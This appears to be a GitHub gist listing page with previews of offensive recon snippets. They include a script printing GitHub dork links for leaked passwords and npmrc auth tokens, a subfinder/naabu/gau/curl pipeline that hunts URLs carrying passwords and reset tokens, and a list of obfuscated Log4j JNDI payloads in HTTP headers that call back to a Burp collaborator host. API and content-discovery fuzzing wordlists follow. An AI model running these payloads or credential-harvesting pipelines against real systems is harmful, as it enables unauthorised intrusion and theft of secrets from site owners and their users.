Skip to content

Instantly share code, notes, and snippets.

View himeda0's full-sized avatar

himeda0

5 followers · 58 following
View GitHub Profile
@jhaddix
jhaddix / Github Dorks
Created January 28, 2023 00:20
echo ""
echo "************ Github Dork Links (must be logged in) *******************"
echo ""
echo " password"
echo "https://github.com/search?q="hackertarget.site"+password&type=Code"
echo "https://github.com/search?q=""hackertarget""+password&type=Code"
echo ""
echo " npmrc _auth"
@R0X4R
R0X4R / tweets.txt
Created February 12, 2022 15:30
tweets collection
subfinder -d target.com -all -silent -t 10 | naabu -p "21,22,80,81,280,300,443,583,591,593,832,981,1010,1099,1311,2082,2087,2095,2096,2480,3000,3128,3333,4243,4444,4445,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7002,7396,7474,8000,8001,8008,8009,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8530,8531,8834,8880,8887,8888,8983,9000,9001,9043,9060,9080,9090,9091,9092,9200,9443,9502,9800,9981,10000,10250,10443,11371,12043,12046,12443,15672,16080,17778,18091,18092,20720,28017,32000,55440,55672" -silent -nc | httprobe -prefer-https | xargs -P 10 -I @ bash -c "echo @ | gau" 2> /dev/null | grep -E "password|password\-reset|reset\-token|token\=" | anew -q urls.txt
xargs -a urls.txt -P 5 -I @ bash -c "curl -ks -L \"@\" -H \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36\" | grep -iE \"enter password|new password|new\-password|confirm password|co
@incogbyte
incogbyte / log4j.txt
Created February 4, 2022 19:22
log4j payloads
User-Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
X-Api-Version: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
Referer: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
X-Forwarded-For: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
Authentication: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
User-Agent: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}
X-Api-Version: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}
Referer: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}
X-Forwarded-For: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}
@helcaraxeals
helcaraxeals / api_wordlist.txt
Created October 3, 2020 11:09 — forked from Uyavuz24/api_wordlist.txt
api wordlist
/2
/graphql-proxy/admin
/3.0/
/3ds_callback
/3ds_update_payment_callback
/accounts
/active
/activity
/actuator
/actuator/auditevents
@yassineaboukir
yassineaboukir / List of API endpoints & objects
Last active September 24, 2025 15:54
A list of 3203 common API endpoints and objects designed for fuzzing.
0
00
01
02
03
1
1.0
10
100
1000
@jhaddix
jhaddix / content_discovery_all.txt
Created May 26, 2018 11:51
a masterlist of content discovery URLs and files (used most commonly with gobuster)
This file has been truncated, but you can view the full file.
`
~/
~
ים
___
__
_